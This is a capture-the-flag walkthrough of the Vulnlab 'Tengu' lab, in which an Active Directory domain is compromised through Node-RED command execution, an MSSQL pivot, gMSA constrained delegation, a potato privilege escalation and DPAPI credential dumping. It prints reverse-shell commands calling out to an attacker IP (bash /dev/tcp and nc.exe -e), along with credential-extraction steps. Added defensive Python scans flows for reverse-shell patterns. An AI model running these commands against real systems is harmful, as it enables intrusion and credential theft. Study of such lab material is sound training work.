
Vulnlab — Tengu

7 min read · Sep 19, 2024

Tengu is a medium-rated chained machine from Vulnlab consisting of two Windows hosts and one Linux host. The Linux host runs a Node-RED instance configured with an MSSQL connection. Command execution through Node-RED leads to decrypting the stored password for that service; pivoting through the Linux host gives access to the MSSQL database, from which the password hash of t2_m.winters, a Linux admin, is dumped. The Linux host's machine account can read a gMSA whose account has constrained delegation to the MSSQL service on the SQL host, which lets us impersonate an MSSQL admin and gain local admin there. Finally, domain admin credentials are recovered through DPAPI and used with Kerberos authentication to log on to the DC.

DC.tengu.vl

PORT     STATE SERVICE       VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tengu.vl
| Issuer: commonName=DC.tengu.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-09-14T15:26:33
| Not valid after: 2025-03-16T15:26:33
| MD5: b350:11ed:41ce:ff32:a34f:0088:ce22:96f5
|_SHA-1: 711b:6409:e399:0771:d3d3:7eba:1938:5914:7c84:7528
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

SQL.tengu.vl

PORT     STATE SERVICE       VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-15T15:30:31+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SQL.tengu.vl
| Issuer: commonName=SQL.tengu.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-09-14T15:26:45
| Not valid after: 2025-03-16T15:26:45
| MD5: 3cd6:9298:18df:b91e:5194:c958:0df4:528b
|_SHA-1: b304:c807:0de4:a171:0c1a:8b16:1f3e:bd29:2e21:99b5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

nodered.tengu.vl

PORT     STATE SERVICE       VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 41:c7:d4:28:ec:d8:5b:aa:97:ee:c0:be:3c:e3:aa:73 (ED25519)
1880/tcp open vsat-control?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Both Windows hosts expose only RDP. On the Linux host, something is listening on port 1880, which a quick search shows is the default port of Node-RED, a flow-based visual programming tool commonly used for IoT devices.

Remote Command Execution Through Node-RED

Node-RED is well known for giving remote command execution (RCE): its exec node runs a system command on the host. To achieve this, we create a flow with an inject (timestamp) node wired into an exec node.

Replacing the curl command in the exec node with a bash reverse shell:

bash -i >& /dev/tcp/10.8.0.136/2222 0>&1

Once the shell connects back, it can be upgraded with python3 to a fully interactive TTY.
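As an added defender-side example (not part of the original post), the following Python audits a Node-RED flows.json export for exec, function and daemon nodes, since each of these runs code on the host, and flags commands that match common reverse-shell patterns such as the one above. The flow data is constructed here to mirror the inject-to-exec flow described in the post.

```python
import json
import re

# Constructed sample flows.json export (not taken from the original post). It mirrors
# the post's flow: an inject (timestamp) node wired into an exec node, plus a benign
# exec node and a function node for comparison.
SAMPLE_FLOWS = json.dumps([
    {"id": "t1", "type": "tab", "label": "Flow 1"},
    {"id": "n1", "type": "inject", "z": "t1", "wires": [["n2"]]},
    {"id": "n2", "type": "exec", "z": "t1",
     "command": "bash -i >& /dev/tcp/10.8.0.136/2222 0>&1", "wires": [[], [], []]},
    {"id": "n3", "type": "exec", "z": "t1", "command": "df -h", "wires": [[], [], []]},
    {"id": "n4", "type": "function", "z": "t1", "func": "return msg;", "wires": [[]]},
])

# Node types that execute arbitrary commands or JavaScript on the Node-RED host.
CODE_EXEC_TYPES = {"exec", "daemon", "function"}

# Patterns typical of reverse shells and download-and-run one-liners.
SUSPICIOUS = re.compile(
    r"/dev/tcp/|\bnc\b|\bncat\b|bash -i|(curl|wget)[^|]*\|\s*(ba)?sh|python[^;]*socket"
)

def audit_flows(flows_json):
    """Return one finding per code-executing node: id, type, severity and a snippet.

    Severity is 'high' when the command/function body matches a suspicious pattern,
    otherwise 'medium' (the node still deserves review, since anyone who can edit
    flows can change what it runs).
    """
    findings = []
    for node in json.loads(flows_json):
        ntype = node.get("type")
        if ntype not in CODE_EXEC_TYPES:
            continue
        body = node.get("func", "") if ntype == "function" else node.get("command", "")
        severity = "high" if SUSPICIOUS.search(body) else "medium"
        findings.append({"id": node["id"], "type": ntype,
                         "severity": severity, "snippet": body[:80]})
    return findings

if __name__ == "__main__":
    for f in audit_flows(SAMPLE_FLOWS):
        print(f"[{f['severity']:6}] {f['type']:8} {f['id']}: {f['snippet']}")
```

Run it against the real flows file (by default ~/.node-red/flows.json) to list every node that can run commands; in the post's scenario the reverse-shell exec node is reported as high.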

In the Node-RED directory we find some kind of hashed password, though it is not clear who it belongs to or how it could be cracked.

Accessing MSSQL

From the properties of the sql node, we can see the connection string, which uses the username nodered_connector.

There is a script that decrypts Node-RED credentials; it needs flows_cred.json (the encrypted credentials) and .config.runtime.json (where Node-RED stores the auto-generated secret the credentials are encrypted with when no credentialSecret is set in settings.js).

To connect to MSSQL we need to pivot, since that service isn't exposed to us; a chisel SOCKS proxy does the job.

chisel server --reverse -p 3000
chisel client 10.8.0.136:3000 R:socks

With this, we can reach port 1433 on sql.tengu.vl.

Trying to enable xp_cmdshell had no luck, as this user doesn't have the required privileges in MSSQL.

Enumerating the databases, there are two non-default ones, Dev and Demo.

Dev didn't have anything interesting, while Demo contained one set of credentials.

Cracking the hash with rockyou.txt didn't work, as the password isn't in that wordlist, but CrackStation had it.

With the credentials recovered, we can verify them against the domain.

With bloodhound-python, the domain can be enumerated through the proxy:

proxychains bloodhound-python -d tengu.vl -u t2_m.winters -p 'Tengu123' -c all -ns 10.10.183.37

Escalating Privileges on the Linux Host

From BloodHound, t2_m.winters is a member of the Linux admins group, which means we have local admin on the Linux host.

Through SSH we can easily switch to the t2_m.winters user.

This host (its machine account, NODERED$) has ReadGMSAPassword on the GMSA01$ account.

Constrained Delegation on SQL Host

The NT hash can be retrieved from /etc/krb5.keytab: on a domain-joined Linux host this file contains the keys of the machine account, in this case NODERED$, and the hash can be extracted with KeyTabExtract.

This hash can be verified by authenticating to the DC.

The gMSA password hash can then be retrieved with the --gmsa module of nxc over LDAP:

proxychains nxc ldap 10.10.238.213  -u 'NODERED$' -H 'hash' --gmsa

This account has AllowedToDelegate on the SQL host, which means we can impersonate users against the MSSQL service on that host through constrained delegation, and reach local admin from there.

With getST.py we can try to impersonate the Administrator user for the MSSQL service on the SQL host, but it didn't work for Administrator.

Instead of Administrator, we can check which other users could be targeted: there is a group named SQL Admins with two members.

Here we can try to impersonate T1_M.Winters and then log in to MSSQL using the ticket:

proxychains impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' -impersonate 'T1_M.WINTERS' -hashes :hash 'tengu.vl/gMSA01$'@sql.tengu.vl -dc-ip 10.10.168.213
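As an added example (not code from the original post or from any of the tools it uses), the following Python models the delegation relationships the post describes and reports which accounts a constrained-delegation principal could impersonate against its target SPNs, and which are shielded from it. The account data and userAccountControl values are constructed; the group names are assumed from the post.

```python
# Constructed directory snapshot (not real data, not from the original post), modelled
# on the post: GMSA01$ has constrained delegation to the MSSQL SPN on sql.tengu.vl with
# protocol transition, Administrator is in Protected Users, and the SQL Admins member
# is an ordinary account.
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # UAC "Use any authentication protocol"
NOT_DELEGATED = 0x100000                    # UAC "Account is sensitive and cannot be delegated"
WORKSTATION_TRUST_ACCOUNT = 0x2000
NORMAL_ACCOUNT = 0x200

ACCOUNTS = {
    "GMSA01$": {"uac": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
                "allowedToDelegateTo": ["MSSQLSvc/sql.tengu.vl", "MSSQLSvc/sql.tengu.vl:1433"]},
    "NODERED$": {"uac": WORKSTATION_TRUST_ACCOUNT, "allowedToDelegateTo": []},
    "Administrator": {"uac": NORMAL_ACCOUNT, "protectedUser": True, "groups": ["Domain Admins"]},
    "T1_M.Winters": {"uac": NORMAL_ACCOUNT, "groups": ["SQL Admins"]},
    "T2_M.Winters": {"uac": NORMAL_ACCOUNT, "groups": ["Linux Admins"]},
}

def is_delegation_protected(acct):
    """Protected Users members and 'sensitive' accounts cannot be delegated, so S4U
    requests naming them fail (this is why impersonating Administrator did not work)."""
    return bool(acct.get("protectedUser")) or bool(acct["uac"] & NOT_DELEGATED)

def delegation_exposure(accounts):
    """For every account with msDS-AllowedToDelegateTo, list its target SPNs, whether it
    has protocol transition (needed to obtain a ticket for an arbitrary user without
    that user's involvement), and which users it could or could not impersonate."""
    report = {}
    users = [n for n in accounts if not n.endswith("$")]
    for name, acct in accounts.items():
        spns = acct.get("allowedToDelegateTo", [])
        if not spns:
            continue
        transition = bool(acct["uac"] & TRUSTED_TO_AUTH_FOR_DELEGATION)
        protected = [u for u in users if is_delegation_protected(accounts[u])]
        impersonable = [u for u in users if transition and u not in protected]
        # Accounts in any "* Admins" group that are still impersonable are the ones to
        # add to Protected Users or mark as sensitive.
        exposed_admins = [u for u in impersonable
                          if any(g.endswith("Admins") for g in accounts[u].get("groups", []))]
        report[name] = {"spns": spns, "protocol_transition": transition,
                        "impersonable": impersonable, "protected": protected,
                        "exposed_admins": exposed_admins}
    return report
```

In a real audit the same logic runs over LDAP results (msDS-AllowedToDelegateTo, userAccountControl and Protected Users membership) instead of the constructed dictionary.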

From here xp_cmdshell could be enabled, as this service runs in the context of gmsa01$.

Checking our privileges, we can get local administrator by abusing SeImpersonatePrivilege with JuicyPotatoNG or any other recent potato exploit:
JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:/Windows/Temp/nc.exe 10.8.0.136 3333 -e cmd.exe"

Lateral Movement: Extracting Credentials Through DPAPI

Running mimikatz to dump the local admin hash and check whether there are any hashes in lsass.

With lsadump::cache, domain cached credentials (DCC2 format) can be found, including one for c.fowler, but this is not an NT hash, so it cannot be used for pass-the-hash unless it gets cracked, which in this case was a rabbit hole.

To dump saved credentials from Credential Manager and Task Scheduler, we can target DPAPI, which protects them with user-specific keys; as local admin we can use SharpDPAPI to decrypt and dump all of the machine credentials:

SharpDPAPI.exe machinecredentials

Using Kerberos Authentication to Spawn a Shell as T0_c.fowler

T0_c.fowler is a domain admin, so we authenticate against the DC to see whether the password is valid.

But the plaintext password wasn't working over NTLM, most likely because the admin users belong to the Protected Users group, which disables NTLM for them; that is why we need Kerberos authentication.

Instead, we can request a TGT for the user with kinit using the plaintext password; for that, the /etc/krb5.conf configuration file needs to point at the domain's KDC:

[libdefaults]
default_realm = TENGU.VL
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
dns_canonicalize_hostname = false
fcc-mit-ticketflags = true

[realms]
TENGU.VL = {
kdc = dc.tengu.vl
}

[domain_realm]
.tengu.vl = TENGU.VL

Having the ticket, we can either dump the hashes from ntds.dit with secretsdump.py or just spawn a shell over SMB, WMI or PsExec.

Written by ARZ101
